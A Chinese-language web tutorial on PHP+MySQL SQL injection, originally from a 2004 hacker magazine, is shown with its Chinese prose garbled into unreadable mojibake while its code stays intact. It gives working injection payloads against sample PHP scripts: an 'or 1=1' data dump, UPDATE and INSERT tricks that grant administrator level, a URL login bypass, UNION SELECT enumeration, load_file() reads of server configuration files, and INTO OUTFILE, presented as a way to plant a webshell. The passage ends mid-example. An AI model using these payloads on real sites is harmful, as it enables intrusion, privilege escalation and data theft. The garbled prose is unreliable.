µçÄÔ°®ºÃÕߣ¬ÌṩIT×ÊѶÐÅÏ¢¼°¸÷Àà±à³Ì֪ʶÎÄÕ½éÉÜ£¬»¶Ó­´ó¼ÒÀ´±¾Õ¾Ñ§Ï°µçÄÔ֪ʶ¡£ ×î½ü¸üР| ÁªÏµÎÒÃÇ RSS¶©Ôı¾Õ¾×îÐÂÎÄÕÂ
µçÄÔ°®ºÃÕß
Õ¾ÄÚËÑË÷£º 
µ±Ç°Î»ÖãºÊ×Ò³>> ÍøÂ簲ȫ>>php×¢ÈëרÌâ:

php×¢ÈëרÌâ

À´Ô´:Ô¶·½ÍøÂç | 2005-5-22 9:13:01 | (ÓÐ2177È˶Á¹ý)

php×¢ÈëרÌâ

´´½¨Ê±¼ä£º2005-03-09
ÎÄÕÂÊôÐÔ£ºÔ­´´
ÎÄÕÂÌá½»£º54alpha (netsh_at_163.com)

php×¢ÈëרÌâ
------------Alpha



/*´ËÎÄÒÑ·¢ÓÚ¡¶ºÚ¿Íxµµ°¸¡·2004Äê10ÆÚרÌâ¡£
½÷ÒÔ´ËÎÄÏ׸ø×î°®ÎҵİְÖÂèÂ裬ÒÔ¼°ËùÓаïÖú¹ýÎÒµÄÈË¡£*/

/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ÓÉÓÚxfocus²»Ö§³ÖÉÏ´«Í¼Æ¬
Äú¿ÉÒÔµ½http://www.54hack.info/txt/php.pdfÏÂÔØ´ËÎĵÄpdfÎĵµ(º¬Í¼Æ¬)*/

Php×¢Èë¹¥»÷ÊÇÏÖ½ñ×îÁ÷ÐеĹ¥»÷·½Ê½£¬ÒÀ¿¿ËüÇ¿´óµÄÁé»îÐÔÎüÒýÁ˹ã´óºÚÃÔ¡£

ÔÚÉÏÒ»Æڵġ¶php°²È«Óë×¢ÉäרÌâ¡·ÖÐÁÖ.linxÖ÷Òª½²ÊöÁËphp³ÌÐòµÄ¸÷ÖÖ©¶´£¬Ò²½²µ½ÁËphp£«mysql×¢ÈëµÄÎÊÌ⣬¿ÉÊǽ²µÄ×¢ÈëµÄÎÊÌâ±È½ÏÉÙ£¬ÈÃÎÒÃǸоõûÓо¡ÐËÊÇ°É.
OK,ÕâÒ»ÆÚÎÒ½«¸ø´ó¼Ò»ï×Ð×ÐϸϸµÄ´µÒ»´µphp£«mysql×¢È룬һ¶¨ÈÃÄãÂúÔضø¹éŶ£¨Ë­ÈÓשͷÁ¨£¡£©¡£
±¾ÎÄÖ÷ÒªÊÇΪС²ËÃÇ·þÎñµÄ£¬Èç¹ûÄãÒѾ­ÊÇÒ»Ö»ÀÏÄñÄØ£¬¿ÉÄÜijЩ¶«Î÷»á¸Ð¾õ±È½Ï·¦Î¶£¬µ«Ö»ÒªÄã×ÐϸµÄ¿´£¬Äã»á·¢ÏֺܶàÓÐȤµÄ¶«Î÷Ŷ¡£

ÔĶÁ´ËÎÄÄãÖ»ÒªÃ÷°×ÏÂÃæµÄÕâµã¶«Î÷¾Í¹»ÁË¡£

1.Ã÷°×php+mysql»·¾³ÊÇÈçºÎ´î½¨µÄ£¬ÔÚ¹âÅÌÖÐÎÒÃÇÊÕ¼´î½¨µÄÏà¹ØÎÄÕ£¬Èç¹ûÄú¶Ô´î½¨php+mysql»·¾³²»ÊǺÜÇå³þ£¬ÇëÏȲéÔÄ´ËÎÄ£¬ÔÚÉÏÒ»ÆÚµÄרÌâÖÐÒ²ÓÐËù½éÉÜ¡£
2.´ó¸ÅÁ˽âphpºÍapacheµÄÅäÖã¬Ö÷ÒªÓõ½php.iniºÍhttpd.conf
¶ø´ËÎÄÎÒÃÇÖ÷ÒªÓõ½µÄÊÇphp.iniµÄÅäÖá£ÎªÁË°²È«Æð¼ûÎÒÃÇÒ»°ã¶¼´ò¿ªphp.iniÀïµÄ°²È«Ä£Ê½£¬¼´ÈÃsafe_mode = On£¬»¹ÓÐÒ»¸ö¾ÍÊÇ·µ»ØphpÖ´ÐдíÎóµÄdisplay_errors Õâ»á·µ»ØºÜ¶àÓÐÓõÄÐÅÏ¢£¬ËùÒÔÎÒÃÇÓ¦¸Ã¹Ø±ÕÖ®£¬
¼´ÈÃdisplay_errors£½off ¹Ø±Õ´íÎóÏÔʾºó£¬phpº¯ÊýÖ´ÐдíÎóµÄÐÅÏ¢½«²»»áÔÙÏÔʾ¸øÓû§¡£
ÔÚphpµÄÅäÖÃÎļþphp.iniÖл¹ÓÐÒ»¸ö·Ç³£ÖØÒªµÄÅäÖÃÑ¡Ïîmagic_quotes_gpc£¬¸ß°æ±¾µÄĬÈ϶¼ÊÇmagic_quotes_gpc£½On£¬Ö»ÓÐÔÚÔ­À´µÄ¹Å¶­¼¶µÄphpÖеÄ
ĬÈÏÅäÖÃÊÇmagic_quotes_gpc£½Off£¬¿ÉÊǹŶ­µÄ¶«Î÷Ò²ÓÐÈËÓõÄŶ£¡
µ±php.iniÖÐmagic_quotes_gpc£½OnµÄʱºò»áÓÐʲôÇé¿ö·¢ÉúÁ¨£¬²»Óþª»Å£¬ÌìÊÇËú²»ÏÂÀ´µÄÀ²£¡ËüÖ»ÊÇ°ÑÌá½»µÄ±äÁ¿ÖÐËùÓÐµÄ ' (µ¥ÒýºÅ), ¡° (Ë«ÒýºÅ), \ (·´Ð±Ïß) ºÍ ¿Õ×Ö·û»á×Ô¶¯×ªÎªº¬Óз´Ð±ÏßµÄתÒå×Ö·û£¬ÀýÈç°Ñ¡¯±ä³ÉÁË\¡¯,°Ñ\±ä³ÉÁË\\¡£
¾ÍÊÇÕâÒ»µã£¬ÈÃÎÒÃǺܲ»Ë¬Å¶£¬ºÜ¶àʱºòÎÒÃǶÔ×Ö·ûÐ͵ľÍÖ»ºÃ˵BYEBYEÁË£¬
µ«ÊDz»ÓÃÆøÄÙ£¬ÎÒÃÇ»¹ÊÇ»áÓк÷½·¨À´¶Ô¸¶ËüµÄ£¬ÍùÏ¿´¿©£¡
3.ÓÐÒ»¶¨µÄphpÓïÑÔ»ù´¡ºÍÁ˽âһЩsqlÓï¾ä£¬ÕâЩ¶¼ºÜ¼òµ¥£¬ÎÒÃÇÓõ½µÄ¶«Î÷ºÜÉÙ£¬ËùÒÔ³äµç»¹À´µÄ¼°Å¶£¡

ÎÒÃÇÏÈÀ´¿´¿´magic_quotes_gpc£½OffµÄʱºòÎÒÃÇÄܸÉЩɶ£¬È»ºóÎÒÃÇÔÙÏë°ì·¨¸ãÒ»¸ãmagic_quotes_gpc£½OnµÄÇé¿ö¹þ

Ò»£ºmagic_quotes_gpc£½OffʱµÄ×¢Èë¹¥»÷
magic_quotes_gpc£½OffµÄÇé¿öËäȻ˵ºÜ²»°²È«£¬Ð°汾ĬÈÏÒ²ÈÃ
magic_quotes_gpc£½OnÁË£¬¿ÉÊÇÔںܶà·þÎñÆ÷ÖÐÎÒÃÇ»¹·¢ÏÖmagic_quotes_gpc£½OffµÄÇé¿ö£¬ÀýÈçwww.qichi.*¡£
»¹ÓÐijЩ³ÌÐòÏñvbb**¾ÍËãÄãÅäÖÃmagic_quotes_gpc£½On£¬ËüÒ²»á×Ô¶¯Ïû³ýתÒå×Ö·ûÈÃÎÒÃÇÓлú¿É³Ë£¬ËùÒÔ˵
magic_quotes_gpc£½OffµÄ×¢È뷽ʽ»¹ÊÇ´óÓÐÊг¡µÄ¡£

ÏÂÃæÎÒÃǽ«´ÓÓï·¨£¬×¢Èëµã and ×¢ÈëÀàÐͼ¸¸ö·½ÃæÀ´Ïêϸ½²½âmysql£«php×¢Èë

A:´ÓMYSQLÓï·¨·½ÃæÏÈ
1¡£ÏȽ²Ò»Ð©mysqlµÄ»ù±¾Óï·¨£¬ËãÊǸøûÓкúÃѧϰµÄº¢×Ó²¹¿ÎÁËŶ~_~
1£©select
SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
select_expression,...
[INTO {OUTFILE | DUMPFILE} 'file_name' export_options]
[FROM table_references
[WHERE where_definition]
[GROUP BY col_name,...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...]
]
³£ÓõľÍÊÇÕâЩ£¬select_expressionÖ¸ÏëÒª¼ìË÷µÄÁУ¬ºóÃæÎÒÃÇ¿ÉÒÔÓÃwhereÀ´ÏÞÖÆÌõ¼þ£¬ÎÒÃÇÒ²¿ÉÒÔÓÃinto outfile½«select½á¹ûÊä³öµ½ÎļþÖС£µ±È»ÎÒÃÇÒ²¿ÉÒÔÓÃselectÖ±½ÓÊä³ö
ÀýÈç

mysql> select 'a';
+---+
| a |
+---+
| a |
+---+
1 row in set (0.00 sec)
¾ßÌåÄÚÈÝÇë¿´mysqlÖÐÎÄÊÖ²á7.12½Ú
ÏÂÃæ˵һЩÀûÓÃÀ²
¿´´úÂëÏÈ
Õâ¶Î´úÂëÊÇÓÃÀ´ËÑË÷µÄŶ

<form method=¡°POST¡± action=¡°<? echo $PHP_SELF; ?>¡°>
<input type=¡°text¡± name=¡°search¡±><br>
<input type=¡°submit¡± value=¡°Search¡±>
</form>
<?php
¡­¡­¡­
SELECT * FROM users WHERE username LIKE ¡®%$search%¡¯ ORDER BY username
¡­¡­.
?>

ÕâÀïÎÒÃÇ˳±ã˵һÏÂmysqlÖеÄͨÅä·û£¬¡¯%¡¯¾ÍÊÇͨÅä·û£¬ÆäËüµÄͨÅä·û»¹ÓС¯*¡¯ºÍ¡¯_¡¯,ÆäÖÐ" * "ÓÃÀ´Æ¥Åä×Ö¶ÎÃû£¬¶ø" % "ÓÃÀ´Æ¥Åä×Ö¶ÎÖµ£¬×¢ÒâµÄÊÇ%±ØÐëÓëlikeÒ»ÆðÊÊÓ㬻¹ÓÐÒ»¸öͨÅä·û£¬¾ÍÊÇÏ»®Ïß" _ "£¬Ëü´ú±íµÄÒâ˼ºÍÉÏÃ治ͬ£¬ÊÇÓÃÀ´Æ¥ÅäÈκε¥¸öµÄ×Ö·ûµÄ¡£ÔÚÉÏÃæµÄ´úÂëÖÐÎÒÃÇÓõ½ÁË¡¯*¡¯±íʾ·µ»ØµÄËùÓÐ×Ö¶ÎÃû£¬%$search%±íʾËùÓаüº¬$search×Ö·ûµÄÄÚÈÝ¡£

ÎÒÃÇÈçºÎ×¢ÈëÁ¨£¿
¹þ¹þ£¬ºÍaspÀïºÜÏàËÆ
ÔÚ±íµ¥ÀïÌá½»
Aabb%¡¯ or 1=1 order by id#
×¢£º#ÔÚmysqlÖбíʾעÊ͵ÄÒâ˼£¬¼´ÈúóÃæµÄsqlÓï¾ä²»Ö´ÐУ¬ºóÃ潫½²µ½¡£
»òÐíÓÐÈË»áÎÊΪʲôҪÓÃor 1£½1ÄØ£¬¿´ÏÂÃ棬

°ÑÌá½»µÄÄÚÈÝ´øÈëµ½sqlÓï¾äÖгÉΪ

SELECT * FROM users WHERE username LIKE ¡®%aabb%¡¯ or 1=1 order by id# ORDER BY username

¼ÙÈçûÓк¬ÓÐaabbµÄÓû§Ãû£¬ÄÇôor 1£½1ʹ·µ»ØÖµÈÔΪÕ棬ʹÄÜ·µ»ØËùÓÐÖµ

ÎÒÃÇ»¹¿ÉÒÔÕâÑù

ÔÚ±íµ¥ÀïÌá½»
%¡¯ order by id#
»òÕß
¡¯ order by id#
´øÈësqlÓï¾äÖгÉÁË
SELECT * FROM users WHERE username LIKE ¡®% %¡¯ order by id# ORDER BY username
ºÍ
SELECT * FROM users WHERE username LIKE ¡®%%¡¯ order by id# ORDER BY username
µ±È»ÁË£¬ÄÚÈÝÈ«²¿·µ»Ø¡£
ÁгöËùÓÐÓû§ÁËÓ´£¬Ã»×¼Á¬ÃÜÂ붼³öÀ´Á¨¡£
ÕâÀï¾Í¾Ù¸öÀý×ÓÏÈ£¬ÏÂÃæ»áÓиü¾«ÃîµÄselectÓï¾ä³öÏÖ£¬selectʵ¼ÊÉϼ¸ºõÊÇÎÞ´¦²»ÔÚµÄŶ£¡
2)ÏÂÃæ¿´update¿©
MysqlÖÐÎÄÊÖ²áÀïÕâô½âÊ͵ģº
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,...
[WHERE where_definition]
UPDATEÓÃÐÂÖµ¸üÐÂÏÖ´æ±íÖÐÐеÄÁУ¬SET×Ó¾äÖ¸³öÄĸöÁÐÒªÐ޸ĺÍËûÃÇÓ¦¸Ã±»¸ø¶¨µÄÖµ£¬WHERE×Ӿ䣬Èç¹û¸ø³ö£¬Ö¸¶¨ÄĸöÐÐÓ¦¸Ã±»¸üУ¬·ñÔòËùÓÐÐб»¸üС£
ÏêϸÄÚÈÝÈ¥¿´mysqlÖÐÎÄÊÖ²á7.17½ÚÀ²£¬ÔÚÕâÀïÏêϸ½éÉܵĻ°»áºÜÂÞàµÄŶ¡£
ÓÉÉÏ¿ÉÖªupdateÖ÷ÒªÓÃÓÚÊý¾ÝµÄ¸üУ¬ÀýÈçÎÄÕµÄÐ޸ģ¬Óû§×ÊÁϵÄÐ޸ģ¬ÎÒÃÇËƺõ¸ü¹ØÐĺóÕߣ¬ÒòΪ......
¿´´úÂëÏÈŶ
ÎÒÃÇÏȸø³ö±íµÄ½á¹¹£¬ÕâÑù´ó¼Ò¿´µÄÃ÷°×
CREATE TABLE users (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
ÆäÖÐuserlevel±íʾµÈ¼¶£¬1Ϊ¹ÜÀíÔ±£¬2ΪÆÕͨÓû§
<?php
//change.php
¡­¡­
$sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'"
¡­¡­
?>
Ok£¬ÎÒÃÇ¿ªÊ¼×¢ÈëÁËŶ£¬ÔÚÌíemailµÄµØ·½ÎÒÃÇÌíÈë
netsh@163.com¡¯,userlevel=¡¯1
sqlÓï¾äÖ´ÐеľÍÊÇ
UPDATE users SET password='youpass',
email='netsh@163.com¡¯,userlevel=¡¯1¡¯ WHERE id='youid¡¯
¿´¿´ÎÒÃǵÄuserlevel¾ÍÊÇ1ÁË£¬±ä³É¹ÜÀíÔ±ÁËÓ´
¹þ¹þ£¬Èç´Ë֮ˬ£¬¼òÖ±ÊǾӼÒÂÃÐбر¸°¡¡£
ÕâÀïÎÒÃǼòµ¥Ìáһϵ¥ÒýºÅ±ÕºÏµÄÎÊÌ⣬Èç¹ûÖ»ÓÃÁËÒ»¸öµ¥ÒýºÅ¶øûÓе¥ÒýºÅÓëÖ®×é³ÉÒ»¶Ô£¬ÏµÍ³»á·µ»Ø´íÎó¡£ÁÐÀàÐÍÖ÷Òª·ÖΪÊý×ÖÀàÐÍ£¬ÈÕÆÚºÍʱ¼äÀàÐÍ£¬×Ö·û´®ÀàÐÍ£¬È»¶øÒýºÅÒ»°ãÓÃÔÚ×Ö·û´®ÀàÐÍÀ¶øÔÚÊý×ÖÀàÐÍÀïÒ»°ãÈ˶¼²»»áÓõ½ÒýºÅ£¨È»¶øÈ´ÊÇ¿ÉÒÔÓõģ¬¶øÇÒÍþÁ¦ºÜ´ó£©£¬ÈÕÆÚºÍʱ¼äÀàÐ;ͺÜÉÙÓÃÓÚ×¢ÈëÁË£¨ÒòΪºÜÉÙÓÐÌύʱ¼ä±äÁ¿µÄ£©¡£ÔÚÏÂÃæÎÒÃÇ»áÏêϸ½«Õ⼸ÖÖÀàÐ͵Ä×¢È뷽ʽŶ£¡

3)ÏÂÃæÂÖµ½insertÁË£¬ËüÒѾ­µÈµÄ²»ÄÍ·³ÁË£¬¼òÖ±¾ÍÏñÖÐÎçʳÌÃÀïµÄѧÉúÃÇ¡£
PhpÖÐÎÄÊÖ²áÊÇÕâÑù½ÌÎÒÃǵģº
INSERT [LOW_PRIORITY | DELAYED] [IGNORE]
[INTO] tbl_name [(col_name,...)]
VALUES (expression,...),(...),...
INSERT°ÑÐÂÐвåÈëµ½Ò»¸ö´æÔڵıíÖУ¬INSERT ... VALUESÐÎʽµÄÓï¾ä»ùÓÚÃ÷È·Ö¸¶¨µÄÖµ²åÈëÐУ¬INSERT ... SELECTÐÎʽ²åÈë´ÓÆäËû±íÑ¡ÔñµÄÐУ¬Óжà¸öÖµ±íµÄINSERT ... VALUESµÄÐÎʽÔÚMySQL 3.22.5»òÒÔºó°æ±¾ÖÐÖ§³Ö£¬col_name=expressionÓï·¨ÔÚMySQL 3.22.10»òÒÔºó°æ±¾ÖÐÖ§³Ö¡£
Óɴ˿ɼû¶ÔÓÚ¼û²»µ½ºǫ́µÄÎÒÃÇÀ´Ëµ£¬insertÖ÷Òª¾Í³öÏÖÔÚ×¢²áµÄµØ·½£¬»òÕßÓÐÆäËüÌá½»µÄµØ·½µØ·½Ò²¿ÉÒÔŶ¡£

¿´¿´±íµÄ½á¹¹ÏÈ
CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
ÎÒÃÇÈÔÈ»¼ÙÉèuserlevel±íʾÓû§µÈ¼¶£¬1Ϊ¹ÜÀíÕߣ¬2ΪÆÕͨÓû§¹þ¡£
´úÂëÈçÏÂ
<?php
//reg.php
¡­¡­
$query = "INSERT INTO members VALUES('$id','$login','$pass','$email',¡¯2')" ;
¡­¡­
?>
ĬÈϲåÈëÓû§µÈ¼¶ÊÇ2
ÏÖÔÚÎÒÃǹ¹½¨×¢ÈëÓï¾äÁËŶ
»¹ÊÇÔÚÒªÎÒÃÇÊäÈëemailµÄµØ·½ÊäÈ룺
netsh@163.com¡¯,¡¯1¡¯)#
sqlÓï¾äÖ´ÐÐʱ±ä³ÉÁË£º
INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com¡¯,¡¯1¡¯)#',?')
¿´ÎÒÃÇÒ»×¢²á¾ÍÊǹÜÀíÔ±ÁË¡£
#ºÅ±íʾʲôÀ´×Å£¬²»ÊÇÍüÁË°É£¬ÔÎÁË£¬Õâô¿ì£¿
Íü¾ÍÍüÁË°É£¬ÏÂÃæÔÙÏêϸ¸øÄã˵˵

2.ÏÂÃæ˵һ˵mysqlÖеÄ×¢ÊÍ£¬Õâ¸öÊǺÜÖØÒªµÄ£¬´ó¼Ò¿É²»ÄÜÔÙ˯¾õÀ²£¬ÒªÊÇÔÙ˯¾õµ½ÆÚÄ©¿¼ÊÔµÄʱºò¾Í¹ÒÁËÄãÃÇ¡£
ÎÒÃǼÌÐø
ÏàÐÅ´ó¼ÒÔÚÉÏÃæµÄ¼¸¸öÀý×ÓÖÐÒѾ­¿´µ½×¢Ê͵ÄÇ¿´ó×÷ÓÃÁË°É£¬ÕâÀïÎÒÃǽ«ÔÙÏêϸ½éÉÜһϡ£
MysqlÓÐ3ÖÖ×¢Ê;䷨
# ×¢Éäµô×¢ÊÍ·ûºóÃæµÄ±¾ÐÐÄÚÈÝ
-- ×¢ÉäЧ¹ûͬ#
/* ... */ ×¢Ê͵ô·ûºÅÖмäµÄ²¿·Ö

¶ÔÓÚ#ºÅ½«ÊÇÎÒÃÇ×î³£ÓõÄ×¢ÊÍ·½·¨¡£
-- ºÅ¼ÇµÃºóÃ滹µÃÓÐÒ»¸ö¿Õ¸ñ²ÅÄÜÆð×¢ÊÍ×÷Óá£
/*¡­*/ ÎÒÃÇÒ»°ãÖ»ÓÃÇ°ÃæµÄ/*¾Í¹»ÁË£¬ÒòΪºóÃæµÄÎÒÃÇÏë¼ÓÒ²²»ÐУ¬ÊÇ°É£¿

×¢Ò⣺ÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë#ʱӦ°ÑËüд³É%23£¬ÕâÑù¾­urlencodeת»»ºó²ÅÄܳÉΪ#£¬´Ó¶øÆðµ½×¢Ê͵Ä×÷Óá£#ºÅÔÚä¯ÀÀÆ÷µÄµØÖ·¿òÖÐÊäÈëµÄ»°¿ÉʲôҲ²»ÊÇŶ¡£
ΪÁË´ó¼ÒÉî¿ÌÀí½â
ÕâÀïÎÒ¸ø´ó¼ÒÀ´¸öÀýÌâ

ÓÐÈçϵĹÜÀíÔ±ÐÅÏ¢±í

CREATE TABLE alphaauthor (
Id tinyint(4) NOT NULL auto_increment,
UserName varchar(50) NOT NULL default '',
PASSWORD varchar(50) default NULL,
Name varchar(50) default NULL,
PRIMARY KEY (Id),
UNIQUE KEY Id (Id),
KEY Id_2 (Id)
)

<?php
//Login.php
¡­¡­
$query="select * from alphaauthor where UserName='$username' and Password='$passwd'";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
Echo ¡°ÖØÒªÐÅÏ¢¡±;
}
Else
Echo ¡°µÇ½ʧ°Ü¡±;
¡­¡­
?>

ÎÒÃÇÔÚä¯ÀÀÆ÷µØÖ·¿òÖ±½ÓÊäÈë
http://***/login.php?username=a¡¯or id=1 %23
%23ת»»³É#ÁË
·Åµ½sqlÓï¾äÖÐ
select * from alphaauthor where UserName='a¡¯or id=1 #' and Password='$passwd'
#ºÅºóÃæµÄ¶¼°ÝÊäÈëÁË£¬¿´¿´
Õâ¾ä»°µÈ¼ÛÓÚ
select * from alphaauthor where UserName='a¡¯or id=1

ÔÙ×Ðϸ¿´¿´±íµÄ½á¹¹£¬Ö»ÒªÓÐid=1µÄÕË»§£¬·µ»ØµÄ$data¾ÍÓ¦¸ÃΪÕæ
ÎÒÃǾÍÖ±½ÓµÇ½ÁË£¬µ±È»ÄãÒ²¿ÉÒÔд
hppt://***/login.php?username=a¡¯or 1£½1 %23
Ò»ÑùµÄÀ²

3.ÏÂÃ潫Ҫ³ö³¡µÄÊÇ¡­¡­
¶ÔÁË£¬¾ÍÊÇÕâЩÏÔʾϵͳÐÅÏ¢µÄ¼äµýÃÇ

VERSION() ·µ»ØÊý¾Ý¿â°æ±¾ÐÅÏ¢
DATABASE() ·µ»Øµ±Ç°µÄÊý¾Ý¿âÃû×Ö£¬Èç¹ûûÓе±Ç°µÄÊý¾Ý¿â£¬DATABASE()·µ»Ø¿Õ×Ö·û´®¡£
USER()
SYSTEM_USER()
SESSION_USER()
·µ»Øµ±Ç°MySQLÓû§Ãû
mysql> select user(),database(),version();
+----------------+------------+----------------+
| user() | database() | version() |
+----------------+------------+----------------+
| root@localhost | alpha | 5.0.0-alpha-nt |
+----------------+------------+----------------+
1 row in set (0.01 sec)
Èçͼ(1)Ëùʾ,ͼ²»ÊǺÜˬÊDz»ÊÇ£¿Õö´óÄãµÄ´óÑÛ¾¦ºÃºÃ¿´Å¶

ÓÐʱºòºÜÓÐÓõÄŶ£¬±ÈÈç˵Äã¿ÉÒÔ¸ù¾ÝËûµÄmysql°æ±¾¿´¿´ËûµÄmysqlÓÐûÓÐʲôÒç³ö©¶´£¬Ã»×¼ÎÒÃǾͷ¢ÏÖ¸öºÃ¶¯¶«¹þ¹þ

4. ÏÂÃæ½øÈë×îÖØÒªµÄ²¿·ÖÁË£¬Ã»Ë¯¾õµÄ´òÆð¾«ÉñÀ´£¬Ë¯×ÅÁ˵ÄÐÑÒ»ÐÑÀ²¡£
1£©select union select
»¹ÊÇphpÖÐÎÄÊÖ²áÖн²µÄ£º
SELECT ... UNION [ALL] SELECT ... [UNION SELECT ...]
UNION ÔÚ MySQL 4.0.0 Öб»ÊµÏÖ¡£
UNION ÓÃÓÚ½«¶à¸ö SELECT Óï¾äµÄ½á¹ûÁªºÏµ½Ò»¸ö½á¹û¼¯ÖС£

ÔÚ SELECT ÖÐµÄ select_expression ²¿·ÖÁгöµÄÁбØÐë¾ßÓÐͬÑùµÄÀàÐÍ¡£µÚÒ»¸ö SELECT ²éѯÖÐʹÓõÄÁÐÃû½«×÷Ϊ½á¹û¼¯µÄÁÐÃû·µ»Ø¡£
SELECT ÃüÁîÊÇÒ»¸öÆÕͨµÄÑ¡ÔñÃüÁµ«ÊÇÓÐÏÂÁеÄÏÞÖÆ£º
Ö»ÓÐ×îºóÒ»¸ö SELECT ÃüÁî¿ÉÒÔÓÐ INTO OUTFILE¡£

ÐèҪעÒâµÄÊÇunionÇ°ºóµÄselect×Ö¶ÎÊýÏàͬ£¬Ö»ÓÐÕâÑùunionº¯Êý²ÅÄÜ·¢»Ó×÷Óá£Èç¹û×Ö¶ÎÊý²»µÈ½«·µ»Ø
ERROR 1222 (21000): The used SELECT statements have a different number of columns ´íÎó
Ôο©£¬ÕâÑù²»ºÃ°É¡£Õ¦°ëÁ¨£¿
±ð¼±¹þ£¬¼±Ò²Ã»ÓõÄ
ÀýÈ磺
ÒÑÖªalphadb±íÓÐ11ÁÐ
ÎÒÃÇ
mysql> select * from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor;
Èçͼ£¨2£©

ÎÒÃÇÖ»slectÁË10¸öÊýµ±È»³ö´íÀ²¡£
ÏÂÃæ¿´
mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
Èçͼ£¨3£©

ÎÒÃÇ¿´¿´id£½247ÖеÄÊý¾ÝÏÈ
mysql> select * from alphadb where id=347;
+-----+--------------------------------------------+-----------------
| id | title | content | importtime | author | accessing | addInto | type | showup | change_ubb | change_html |
+-----+--------------------------------------------+-----------------
| 347 | ÀûÓÃadsutil.vbs+..--·¢±íÓںڿ͵µ°¸2004.6ÆÚ | ·¢±íÓÚºÚ¿Íxµµ°¸µÚ6ÆÚ | 2004
-03-28 11:50:50 | Alpha | 17 | Alpha | 2 | 1 | 1 | 1 |
+-----+--------------------------------------------+-----------------
1 row in set (0.00 sec)
ÎÒÃÇ¿´µ½£¬ËüµÄ·µ»Ø½á¹ûºÍ
mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
ÊÇÏàͬµÄ¡£
Ŷ£¬´ó¼Ò»òÐí»áÎÊ£¬ÕâÑùÓÐʲôÓÃÄØ£¿
Îʵĺá£
Ok£¬¼ÌÐøÊÔÑé
µ±ÎÒÃÇÊäÈëÒ»¸ö²»´æÔÚµÄidµÄʱºò
ÀýÈçid=0£¬»òÕßid=347 and 1<>1
ÔÙ¿´¿´
mysql> select * from alphadb where id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
Èçͼ£¨4£©

ÎÒÃÇ·¢ÏÖËü°ÑÎÒÃǺóÃæµÄ1,2,3,4,5,6,7,8,9,10,11¸³¸øÁ˸÷¸ö×Ö¶ÎÀ´ÏÔʾ¡£
¹þ¹þ£¬ÖÕÓÚÏÔʾ²»Ò»ÑùÁË£¬¿ÉÊÇÕâÓÐʲôÓÃÄØ£¿
ÏȲ»¸æËßÄã¡£
ÎÒÃǽ²Ò»¸ö¾ßÌåµÄÀý×ÓÏÈ
http://localhost/site/display.php?id=347
¿´¿´Í¼5

http://localhost/site/display.php?id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor
½á¹ûÈçͼ6

ÏÂÃæÎÒÃÇÓÃÒ»·ùͼÀ´×ܽáÒ»ÏÂunionµÄÓ÷¨Èçͼ7

Ok£¬ÖªµÀÔõôÀûÓÃÁ˲»£¿²»ÖªµÀµÄ»°ÏÂÃ潫»áÏêϸ¸æËßÄã¡£
2£©LOAD_FILE
Õâ¸ö¹¦ÄÜÌ«Ç¿´óÁË£¬ÕâÒ²ÊÇÁÖ.linxÔÚÉÏÒ»¸öרÌâÖÐÌáµ½µÄ·½·¨¡£ËäȻ˵¹ýÁË£¬¿ÉÎÒÒ²²»µÃ²»ÔÙÌá³öÀ´¡£
Load_file¿ÉÒÔ·µ»ØÎļþµÄÄÚÈÝ£¬¼ÇµÃдȫÎļþµÄ·¾¶ºÍÎļþÃû³Æ
Etc.
ÎÒÃÇÔÚmysqlµÄÃüÁîÐÐÏÂÊäÈë

mysql> select load_file('c:/boot.ini');
Ч¹ûÈçͼ£¨8£©

¿ÉÊÇÎÒÃÇÔÚÍøÒ³ÖÐÔõô¸ãÄØ£¿
ÎÒÃÇ¿ÉÒÔ½áºÏunion selectʹÓÃ
http://localhost/site/display.php?id=347%20and%201<>1%20union%20select%201,2,load_file('c:/apache/htdocs/site/lib/sql.inc'),4,5,6,7,8,9,10,11
ÕâÀïµÄc:/apache/htdocs/site/lib/sql.inc²¢²»ÊÇÎÒµÄÅäÖÃÎļþŶ£¬£ºP
¿´×Ðϸͼ9ÖеÄ

¿´¿´£¬ÎļþÄÚÈݱ©Â¶ÎÞÒÉ¡£
ÎÒÃÇΪʲôҪ°Ñload_file('c:/apache/htdocs/site/lib/sql.inc')·ÅÔÚ3×Ö¶ÎÄØ£¿ÎÒÃÇÇ°ÃæÌáµ½ÁÐÀàÐÍÒ»¹²ÓÐÄÇôÈýÖÖ£¬¶øÔ­À´Í¼7ÖÐÏÔʾ3µÄµØ·½Ó¦¸ÃÊÇÏÔʾÎÄÕÂÄÚÈÝ£¬Ó¦¸ÃÊÇ×Ö·ûÐ͵ģ¬¶øload_file('c:/apache/htdocs/site/lib/sql.inc')Ò²Ò»¶¨ÊÇ×Ö·ûÐ͵ģ¬ËùÒÔÎÒÃDz²â·ÅÔÚ3×ֶοÉÒÔ˳ÀûÏÔʾ¡£
Æäʵ»¹ÓкܶàºÃµÄÀûÓ÷½·¨£¬¼ÌÐøÍùÏ¿´Å¶£¡
3) select * from table into outfile'file.txt'
ÓÐɶÓÃÁ¨£¿
×÷ÓþÍÊǰѱíµÄÄÚÈÝдÈëÎļþ£¬ÖªµÀÓжàÖØÒªÁË°É£¬ÎÒÃÇд¸öwebshell°É£¬¹þ¹þ¡£
µ±È»ÎÒÃDz»Ö»Êǵ¼³ö±í£¬ÎÒÃÇ»¹¿ÉÒÔµ¼³öÆäËü¶«Î÷µÄŶ£¬ÍùÏ¿´À²¡£
¼ÙÉèÓÐÈçϱí

#
# Êý¾Ý±íµÄ½á¹¹ `test`
#

CREATE TABLE test (
a text,
b text
